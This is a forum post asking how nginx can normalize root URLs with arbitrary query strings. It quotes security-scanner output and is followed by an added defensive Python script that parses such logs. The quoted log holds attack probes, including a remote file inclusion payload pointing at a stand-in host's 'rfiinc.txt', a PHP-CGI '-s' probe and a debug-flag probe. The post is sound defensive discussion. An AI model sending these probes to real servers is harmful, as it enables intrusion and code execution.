canonicalization of $uri with "/?.*" content

April 16, 2015 10:13AM
The last security audit revealed the following:

V:Wed Apr 15 20:58:19 2015 - 200 for GET: /?mod=node&nid=some_thing&op=view
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?OpenServer
V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?PageServices
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?wp-cs-dump
V:Wed Apr 15 21:03:06 2015 - 200 for GET: /?D=A
V:Wed Apr 15 21:04:58 2015 - 200 for GET: /?_CONFIG[files][functions_page]=http://example.com/rfiinc.txt?
V:Wed Apr 15 21:08:00 2015 - 200 for GET: /?-s
V:Wed Apr 15 21:08:09 2015 - 200 for GET: /?q[]=x
V:Wed Apr 15 21:08:41 2015 - 200 for GET: /?sc_mode=edit
V:Wed Apr 15 21:09:30 2015 - 200 for GET: /?admin

In plain words, there is an infinite number of $request_uri values that return the content of the canonical address.

You can test your own domain "example.com":

canonical:
http://example.com/

unwanted variants:
http://example.com/?mod=node&nid=some_thing&op=view
http://example.com/?Open
http://example.com/?OpenServer
...

Is there an nginx parameter to normalize this type of $uri?
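
An added example, not part of the original post: a small triage script for scanner output in the format quoted above, listing every path that answered 200 to a query string it is not expected to accept. The sample lines and the per-path allowlist are constructed assumptions; `unexpected_query_hits` is a hypothetical helper name.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Scanner line format as quoted in the post:
#   V:<timestamp> - <status> for <METHOD>: <request target>
LINE_RE = re.compile(
    r"^V:(?P<ts>.+?) - (?P<status>\d{3}) for (?P<method>[A-Z]+): (?P<target>\S+)$"
)

# Constructed sample in the same format (not the poster's real audit output).
SAMPLE = """\
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open
V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F36
V:Wed Apr 15 21:00:01 2015 - 200 for GET: /search?q=nginx
V:Wed Apr 15 21:00:02 2015 - 404 for GET: /missing?Open
V:Wed Apr 15 21:00:03 2015 - 200 for GET: /about
"""


def unexpected_query_hits(log_text, allowed=None):
    """Map path -> sorted query strings that returned 200 although they
    carry parameter names the path is not expected to accept.

    allowed: dict of path -> set of parameter names the path really uses
    (assumption: an allowlist supplied by the site owner).
    """
    allowed = allowed or {}
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["status"] != "200":
            continue  # unparsable line, or the server did not serve content
        path, sep, query = m["target"].partition("?")
        if not sep or not query:
            continue  # no query string: already the canonical form
        # keep_blank_values keeps bare flags such as "?Open" and "?-s",
        # and an empty name as in "?=PHP...".
        names = {k for k, _ in parse_qsl(query, keep_blank_values=True)}
        if names - allowed.get(path, set()):
            hits[path].add(query)
    return {p: sorted(q) for p, q in hits.items()}


if __name__ == "__main__":
    for path, queries in unexpected_query_hits(SAMPLE, {"/search": {"q"}}).items():
        print(path, "->", queries)
```
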
Subject Author Posted

canonicalization of $uri with "/?.*" content

173279834462 April 16, 2015 10:13AM

Re: canonicalization of $uri with "/?.*" content

Francis Daly April 17, 2015 03:16AM

Re: canonicalization of $uri with "/?.*" content

173279834462 April 17, 2015 09:10AM

Re: canonicalization of $uri with "/?.*" content

Francis Daly April 18, 2015 04:28AM


